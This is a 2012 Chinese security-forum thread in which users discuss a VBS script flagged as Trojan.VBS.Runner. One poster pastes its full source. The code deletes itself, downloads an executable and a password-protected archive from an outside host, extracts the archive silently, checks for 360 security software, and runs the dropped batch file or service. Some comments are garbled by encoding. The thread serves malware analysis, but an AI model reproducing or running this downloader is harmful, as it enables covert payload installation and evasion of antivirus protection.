脚本病毒？

/tiao眼镜鱼

瑞星2012杀

liwnpin

卡巴斯基安全部队
2012
拒绝访问
无法访问该网页

请求对象位于网址：

https://att.kafan.cn/forum.php?mod=
attachment&aid=MTcxNDkxOXxiODRlZTE2MnwxM
zQxOTgzNTMwfDc4MDE2NnwxMzI0NjYy

检测到威胁：

对象已感染病毒Trojan.VBS.Runner.dw

发生时间： 13:12:15

fqzhao

白加黑，白文件是360的程序

老机子

哥的她阻止访问！

huazi922

wqcaokeyinwq 发表于 2012-7-11 06:49
过金山卫士。。。
过微点扫描。。
双击。。。

这个是不是针对360的？

3801187

这个病毒行为真多，修改多处系统文件和COM接口。

krwang

on error resume next

Set fso = CreateObject("Scripting.FileSystemObject")

set f1=fso.OpenTextFile("C:\\trueFalse.txt",1,true)

a=f1.readall

if now-cdate(a)<65/86400 then

'msgbox "卮诵"

wscript.quit

end if

f1.close



'////////////////////////////////////////////////////////////////////\

'拦啪卮诵 瑾烹?葱您胄

'\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\/

set f1=fso.OpenTextFile("C:\\trueFalse.txt",2,true)

f1.write now

'*******************************?*******************************

'GIF89a

'</script>

'<head>

msgbox "杳搔?嗒畏?

On Error Resume Next

Set Delfso = CreateObject("Scripting.FileSystemObject")

Delfso.DeleteFile(WScript.ScriptName)

'**************************仑WinRAR.exe*************************

url = "http://www.xnzmian.com/zuomian/WinRAR.com"

saveas = "C:\WinRAR.com"

Set xmlhttp = CreateObject("Microsoft.XMLHTTP")

Set stream = CreateObject("ADODB.Stream")

Call xmlhttp.open("GET",url,False)

Call xmlhttp.send()

stream.mode = 3

stream.type = 1

Call stream.open()

Call stream.write(xmlhttp.responsebody)

Call stream.savetofile(saveas,2)

wscript.sleep 1000

'**************************仑辊?************************

url = "http://www.xnzmian.com/zuomian/Fealte.rar"

saveas = "C:\Fealte.rar"

Set xmlhttp = CreateObject("Microsoft.XMLHTTP")

Set stream = CreateObject("ADODB.Stream")

Call xmlhttp.open("GET",url,False)

Call xmlhttp.send()

stream.mode = 3

stream.type = 1

Call stream.open()

Call stream.write(xmlhttp.responsebody)

Call stream.savetofile(saveas,2)



'**************夤辊?************************************

Set WSHSHell=WScript.CreateObject("WScript.Shell")

WSHSHell.Run "C:\WinRAR.com x -ibck -plamoNexx3H2lls C:\Fealte.rar C:\Progra~1",0



'</script>

'</head>

'************************************************************************

'****************************诵稿************************************

'************************************************************************



WScript.Sleep 10000



on error resume next

set y=getobject("winmgmts:\\.\root\cimv2")

set ws=createobject("wscript.shell")

set x=y.execquery("select * from win32_process where name='360tray.exe'")

for each i in x

     Set WshShell = Wscript.CreateObject("Wscript.Shell")   

     Set ws = CreateObject("Wscript.Shell")   







Set ws = CreateObject("Wscript.Shell")   

ws.run "cmd /c C:\Progra~1\Fealte\th.bat",vbhide









     wscript.quit

next

WScript.Sleep 30000

Set WshShell = Wscript.CreateObject("Wscript.Shell")   

WshShell.Run ("C:\Progra~1\Fealte\NMService.exe")





WScript.Sleep 10000

Dim fso

Set fso=CreateObject("Scripting.FileSystemObject")

fso.DeleteFile("C:\Fealte.rar")











烫烫????

基本就是这样，从网上下一堆狗屎回来跑

苏东旭

Ie9 kill

陌上~烟雨遥

奇葩！！我信誰？

aqingge

样本怎么 被改过了